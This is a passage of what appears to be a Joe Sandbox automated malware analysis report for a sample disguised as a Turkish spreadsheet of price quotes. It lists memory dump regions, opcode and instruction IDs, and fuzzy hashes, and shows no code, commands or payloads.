                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fcd1bd846e4d645ef12aefdc87ab5d544a6704fa6da04c9101f1fa1bc9a8ea8a
                                                  • Instruction ID: 77bc60aeb898ed9925a027c36f919a948882f1e4a69d59f81d3cf550e19a2e33
                                                  • Opcode Fuzzy Hash: fcd1bd846e4d645ef12aefdc87ab5d544a6704fa6da04c9101f1fa1bc9a8ea8a
                                                  • Instruction Fuzzy Hash: C8414934B002099FCB18EB69D894F6ABBB6FB89200F11842AE8169B255DF34D801CF70
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d5b8e63f5d43c436b121cf6746ba342d533cf5052031c0c01354604e1229de0b
                                                  • Instruction ID: 27d813ffe9a1bcc39b6305be1457c623fa914d50f3f275176451f495b318d232
                                                  • Opcode Fuzzy Hash: d5b8e63f5d43c436b121cf6746ba342d533cf5052031c0c01354604e1229de0b
                                                  • Instruction Fuzzy Hash: 4C41C674E01208CFDB29DFB9D44469DBBB6BF88344F24812EE419AB261DB319D42CF40
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 37fdede03535d58788a3479916888f1f2978b51d5cff6e4ce500b13a24417673
                                                  • Instruction ID: e8390d3a97e567357674cbade494462ad0109936756d8904223809976931e6c5
                                                  • Opcode Fuzzy Hash: 37fdede03535d58788a3479916888f1f2978b51d5cff6e4ce500b13a24417673
                                                  • Instruction Fuzzy Hash: DE51A474E01208DFDB19DFB9D594A9DBBB2BF89304F20812EE419AB364DB359941CF40
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063553048.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e00000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 48d665f5deef02f6f6521fbf07fb76bf7c1c5afeb487fa822bee8a3b50ecaf40
                                                  • Instruction ID: f0a9fabe4cee971a7dbef85e8c67d05b08d799f4cf7697910007557cc626396e
                                                  • Opcode Fuzzy Hash: 48d665f5deef02f6f6521fbf07fb76bf7c1c5afeb487fa822bee8a3b50ecaf40
                                                  • Instruction Fuzzy Hash: B451E274905218CFDBA4CF59D888BE9B7F2BB49304F54A0EAC149B3280DB745AC5CF14
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063553048.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e00000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 87b69dd977a508cac6fc4fec5840b8352a1c632ac40dd8c8b020e0e880a87ff9
                                                  • Instruction ID: 7792e0d86d6c79c44276ba1e92ed6527e278eb72e59e3ff9faaa785ec7f649c0
                                                  • Opcode Fuzzy Hash: 87b69dd977a508cac6fc4fec5840b8352a1c632ac40dd8c8b020e0e880a87ff9
                                                  • Instruction Fuzzy Hash: 7F51D974A02219CFEB54EF69D894BAD7BB2FB49300F0041AAE44EA7354DB345D85CF51
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: acad1ed7c1fd0fcc45db237a857b13c5176bf2bfd0254994ad1e63dfdc734c9e
                                                  • Instruction ID: 0ab10fef0b10000917fd88ba6a8ec6bbbdea6bf63844cd251e90ca4b0c474ff5
                                                  • Opcode Fuzzy Hash: acad1ed7c1fd0fcc45db237a857b13c5176bf2bfd0254994ad1e63dfdc734c9e
                                                  • Instruction Fuzzy Hash: 0431CE72B14104CFC714CE69D880BEEB7B2FBCE314F2581B6D10A97665D7B49D918B50
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1f4dfee1c342432d445fb00d2ddf8f4d032894ba9a913e701486e21822f23ff8
                                                  • Instruction ID: bfd5516960866052914d83123e129c6e9a2457b6d9c8700be4c22e69abfa695e
                                                  • Opcode Fuzzy Hash: 1f4dfee1c342432d445fb00d2ddf8f4d032894ba9a913e701486e21822f23ff8
                                                  • Instruction Fuzzy Hash: 31314A366102149FDB19CF54D844F69BBBAFF89320F0580A9EA199B372C731ED92DB50
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 243b0330a4920e5a1b2d4ff6a8972f6b306750576103d2cc5280868e170ef12e
                                                  • Instruction ID: 56680c972bec6e62fbd41295f19ae00a516c442114073b568022d2d6ea636ced
                                                  • Opcode Fuzzy Hash: 243b0330a4920e5a1b2d4ff6a8972f6b306750576103d2cc5280868e170ef12e
                                                  • Instruction Fuzzy Hash: 0E31D336610118AFCB05DF59D888EA9BBB2FF48320F1680A9E51A9B372C731ED55DB50
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 429131f453b942ab6d2734da67d2f94855027dceb39a703dcd35a4205a6bd6fa
                                                  • Instruction ID: 7049f37cca127e0c34b1780637d2997fea00d02f858ed93bee80ff825eb70d94
                                                  • Opcode Fuzzy Hash: 429131f453b942ab6d2734da67d2f94855027dceb39a703dcd35a4205a6bd6fa
                                                  • Instruction Fuzzy Hash: 01412270D052188FDB04DFA9D944BEEFBF2BB49300F00806AE416A7295D7759A85CF61
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 425dc26397c9f57cf34cd8d89a9ad2d6c3645e9ee43fd62df438bed94758f311
                                                  • Instruction ID: 2ee02e23bda5d8c8f77ca2114886ce5bf6d33bd96c7b6a96ff6f9d18e48de61b
                                                  • Opcode Fuzzy Hash: 425dc26397c9f57cf34cd8d89a9ad2d6c3645e9ee43fd62df438bed94758f311
                                                  • Instruction Fuzzy Hash: 0E416B71A002198FCB14DFA9C844AAEFBB1FF88301F018469D526E7291DB34D945CBB1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 837e3d26007a4090ea0db50ccf0d623c2da51c3825e2cefca2c2c2bb610c86e2
                                                  • Instruction ID: 038a3e1868b1f4a6f8d0ec2247b03c03782ddec7d29f4dc0f351f77b65fa4be6
                                                  • Opcode Fuzzy Hash: 837e3d26007a4090ea0db50ccf0d623c2da51c3825e2cefca2c2c2bb610c86e2
                                                  • Instruction Fuzzy Hash: D5316175A052099FCB04DF68E884E9EFBB5FF49310F1540AAE916DB360DB319905CB70
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063553048.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e00000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c10b158ed7d1cebcc811a6108b19aa3ce0fbbf36ab457cd775aa0c40dd565297
                                                  • Instruction ID: 4feac2e998f7806b97f18d61a03efaa6948345cb05783823b4dc19ba5a59f7ea
                                                  • Opcode Fuzzy Hash: c10b158ed7d1cebcc811a6108b19aa3ce0fbbf36ab457cd775aa0c40dd565297
                                                  • Instruction Fuzzy Hash: 2F4105B4A11218CFDB14CF94D848BEDBBB2FB49304F40602AE54AAB290D7799984CF55
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b145b377a217c41666dae2d0a94ea93d03ee26d41a6a5e0167d3e7491fbd2672
                                                  • Instruction ID: e2420d3185e1b831f226ca542727bf6622d8871dd16ce00524e39fe8e4941fa2
                                                  • Opcode Fuzzy Hash: b145b377a217c41666dae2d0a94ea93d03ee26d41a6a5e0167d3e7491fbd2672
                                                  • Instruction Fuzzy Hash: F1310A35B00119DBDF14DFA4D955AEEBBB6FF88310F108125E912B7264DB31AD45CBA0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 410ba1c6e76ff416eaacc387dbad5b89a1ff55d6ef49195d873f92f592fe506f
                                                  • Instruction ID: 5904830381cbd62bdc703586a96bb10e779b843589fc2992e032fdb86e80444e
                                                  • Opcode Fuzzy Hash: 410ba1c6e76ff416eaacc387dbad5b89a1ff55d6ef49195d873f92f592fe506f
                                                  • Instruction Fuzzy Hash: 92413A74A012188FEB24EB24CDA1FA9B7B1BF58710F5001D5EA0AAB391D731DD81CF60
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 166299feb2a9a9dd2ca62dcb127186538bade7d15e2e81b8190ed46f330f26bb
                                                  • Instruction ID: 2b17a19b0cc6445594eceb807ddf4de1a9a308401674e646953dd725c3928c94
                                                  • Opcode Fuzzy Hash: 166299feb2a9a9dd2ca62dcb127186538bade7d15e2e81b8190ed46f330f26bb
                                                  • Instruction Fuzzy Hash: 003118B4E056099FDB04DF9AD484AEEBBF6FB89300F10C069D826A3354D7785941CF64
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6b01c02042d4ca5cca980f6d6ab8e213b10eec73c671e82f4f2ae714e24f5c2b
                                                  • Instruction ID: 2ef3c6f37d903517dad0ffd04ab858e6c2990383529c9328feec540c54e16678
                                                  • Opcode Fuzzy Hash: 6b01c02042d4ca5cca980f6d6ab8e213b10eec73c671e82f4f2ae714e24f5c2b
                                                  • Instruction Fuzzy Hash: AC316B35D0E7848FDB0ACB6998952947BB0AF5E22070A40E7C085CF2B3D778A896CB51
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1db68f3da285d3daccad1adfc13e0d970fed833b53d37f4249b4f81256707203
                                                  • Instruction ID: 49edf940e94d8bd63be17e953f83f820e8ed1aa21e1c5d64490bb66ee35a2780
                                                  • Opcode Fuzzy Hash: 1db68f3da285d3daccad1adfc13e0d970fed833b53d37f4249b4f81256707203
                                                  • Instruction Fuzzy Hash: E241F7B4D06319CFEB25CFAAC884B9DBBFABB48304F5481A9D009A7295D7745D80DF40
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 435c127f8a2e00995d905c8f4c4eeeef910bf533a90189656d5485a8d323437c
                                                  • Instruction ID: d850f349802e404ef33b1d9917d44bdcc6f43c020772f45b6ce73ee47cdc0e66
                                                  • Opcode Fuzzy Hash: 435c127f8a2e00995d905c8f4c4eeeef910bf533a90189656d5485a8d323437c
                                                  • Instruction Fuzzy Hash: 5C31C2B0906218CFDB68DF9AD948FADFBF2FB49304F509469D01AA7254DB755882CF20
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 88e9f71cd94cb9a30bedc01af475996dbde9a6aa488dc25080dd254e85849662
                                                  • Instruction ID: 05d056e16a720a9f826972051ad63ad12f4e54c358499495f576eee1ef9106cc
                                                  • Opcode Fuzzy Hash: 88e9f71cd94cb9a30bedc01af475996dbde9a6aa488dc25080dd254e85849662
                                                  • Instruction Fuzzy Hash: E13147B4E05209CFDB44CFA9D895AEEBFF6FB89310F00802AE409A3251D7355941CBA4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b6fc879ef65aef976a4f8ff732fafd991c139656b0b5c2ce0e2e8d2a516c1256
                                                  • Instruction ID: f5e90b8810d8b2257d75057b97fa269b6f2fe1e8a94cbdfb382a4e4764b6bb44
                                                  • Opcode Fuzzy Hash: b6fc879ef65aef976a4f8ff732fafd991c139656b0b5c2ce0e2e8d2a516c1256
                                                  • Instruction Fuzzy Hash: A5313774E002099FCF05DFA9D8459EEBFB6FF88310F10846AE806A3361DB305905CB61
                                                  Memory Dump Source
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b2b7c154b9d1323ab23e924a8366363eeb0f0c26ff32be16109b02696c598153
                                                  • Instruction ID: 2d2c07e54950a3bba69842a1623097e4fd0414878ae1144590ce62115bf36977
                                                  • Opcode Fuzzy Hash: b2b7c154b9d1323ab23e924a8366363eeb0f0c26ff32be16109b02696c598153
                                                  • Instruction Fuzzy Hash: 06112BB5B802108FCB44EB78D958D5E3BEAAF9D25131105A5E50ACB375EE39DC008B60
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f78e1642bdf5e4f20d67f02f6a1a69f0768c6817585e00f28f1cc13f6e412644
                                                  • Instruction ID: ebfa49bd72752614792305f2cb3d203cbf87f5e3693efd396100360aa972cb0d
                                                  • Opcode Fuzzy Hash: f78e1642bdf5e4f20d67f02f6a1a69f0768c6817585e00f28f1cc13f6e412644
                                                  • Instruction Fuzzy Hash: 18111875B802108FCB45EB7CD958D5E3BEAAF9D26031205A9E50ACF375EE79DC0187A0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063553048.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e00000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a9d0f9a3d55245b977a39229bdeb24c1991879638e3aee31418d4e41f5698627
                                                  • Instruction ID: 06db2607be488a4e3681a5f8b732c9d508ceac764535ad7ba6916ff4356c668a
                                                  • Opcode Fuzzy Hash: a9d0f9a3d55245b977a39229bdeb24c1991879638e3aee31418d4e41f5698627
                                                  • Instruction Fuzzy Hash: DC2135B1D1420ADFCF00CFA9D8497EEBBB1FB49305F80A469D415B3290DB385686CB51
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ecece73eaae9fcb2e185478936098e717e408cb379faf0d6f51d8c65f947968d
                                                  • Instruction ID: 41ab9c09131b377823d3b93c611b03c25a633be30ae3f3da0041d9a5a2307b99
                                                  • Opcode Fuzzy Hash: ecece73eaae9fcb2e185478936098e717e408cb379faf0d6f51d8c65f947968d
                                                  • Instruction Fuzzy Hash: FE11B2316093849FD706CB28E8506D9BFB5EF8F320F1840FBC048CB566D6399852C721
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: babbfc67a2bddc19b63b27a861a193eefc5c20dc541ebf58d6c0eaf3efd13d8d
                                                  • Instruction ID: a4a96e5c67bf6528200b92441464da6c77ddd3c03544f5f834a46e6d79da7312
                                                  • Opcode Fuzzy Hash: babbfc67a2bddc19b63b27a861a193eefc5c20dc541ebf58d6c0eaf3efd13d8d
                                                  • Instruction Fuzzy Hash: 2111B631B142099FCF14EF699819BBEBBF6EB88610F054025E916DB280DE7089019FB0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063553048.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e00000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 085b70b255c8f991ea429b50b3e1e0fd5451526bc56040fbd3722d8066d6f83d
                                                  • Instruction ID: 7c7159aedd0764e7a025a03dc43920b6d85cc8912a9833bfed75a9a0836a1e52
                                                  • Opcode Fuzzy Hash: 085b70b255c8f991ea429b50b3e1e0fd5451526bc56040fbd3722d8066d6f83d
                                                  • Instruction Fuzzy Hash: AF21F470D04209DBCF00CFA9D8487EEBBB6FB49301F90A469D459B3295DB745A868B51
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b6f0ae756729b240bf4c87267177dae90d56ed7a8454aad16382176b46310f5e
                                                  • Instruction ID: 42ced1a19960fe851659d3298ad1ef15c75cc524dc439deab52b47be047ce93a
                                                  • Opcode Fuzzy Hash: b6f0ae756729b240bf4c87267177dae90d56ed7a8454aad16382176b46310f5e
                                                  • Instruction Fuzzy Hash: B711277A908154AFDB068F95DC44E887FBAAF1A321F0680D6E6089B232D232D955EB50
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 210ca8497262a504fbe56e308f6092dbb20af07d53e889b51730120db99ac1be
                                                  • Instruction ID: 58af3ab2129632ec934da36e7b379dfc0d902d15afa3fa358fcb4d16e5498520
                                                  • Opcode Fuzzy Hash: 210ca8497262a504fbe56e308f6092dbb20af07d53e889b51730120db99ac1be
                                                  • Instruction Fuzzy Hash: 6A215C74906208CFDB14EF69D498B9CBBF2FB45304F4041AAE50AA7395DB345E85CF61
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5a8d5b9832acd252b0282fba5c07bda392ef96279b12b620a411537ee7e1aa39
                                                  • Instruction ID: 22541fe62d4fb92a05404347b1d7a8eba153b9114ff17e20cddbba713a48c32e
                                                  • Opcode Fuzzy Hash: 5a8d5b9832acd252b0282fba5c07bda392ef96279b12b620a411537ee7e1aa39
                                                  • Instruction Fuzzy Hash: FF11F670D0421ACFCB08CF99E455AFEBBB6FB8C311F10803AD515B2254D7755A96CBA1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d30d9ffdd5bd636ec615db0d8049e90642c849bd40d06285d3ecaaee8e842c19
                                                  • Instruction ID: 526258bf82c5320b8c8f79efc6907fa4f4538a8d00929256020a475c464c81f9
                                                  • Opcode Fuzzy Hash: d30d9ffdd5bd636ec615db0d8049e90642c849bd40d06285d3ecaaee8e842c19
                                                  • Instruction Fuzzy Hash: 1B01DB716097405FCB61CBA4E99099ABFB0EB23314B154D9FC06AC7193D622E817C751
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8e5e217778da2c9bb1b36c064336dfa04924c2fc6c1c0d512b5fdc6f84181336
                                                  • Instruction ID: 4e39e75702500bc7de210d926bec02408ee381291b1d280bf66379e996de1850
                                                  • Opcode Fuzzy Hash: 8e5e217778da2c9bb1b36c064336dfa04924c2fc6c1c0d512b5fdc6f84181336
                                                  • Instruction Fuzzy Hash: EC217274905108CFDB18DF6AD844BDEBBF6FB8A301F408169E40A67355DB345985CF60
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2041475426.000000000148D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0148D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_148d000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                  • Instruction ID: 1973772f50b874fb3e1c634719628d7e315e0cd91b0e9b051202ccad083d53c1
                                                  • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                  • Instruction Fuzzy Hash: 8E11E172804284CFCB02DF44D5C4B1ABF71FB88324F24C5AAD9490B267C33AD45ACBA2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2041475426.000000000148D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0148D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_148d000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                  • Instruction ID: f1b1e54e5916d420ba8cfaa63abdadd3fe80f2c1d7798210b33db56cbdb4d5fa
                                                  • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                  • Instruction Fuzzy Hash: 0211E172904240CFCB02DF44D5C4B1ABF72FB84314F24C5AAD9094B2A7C336D45ACBA2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
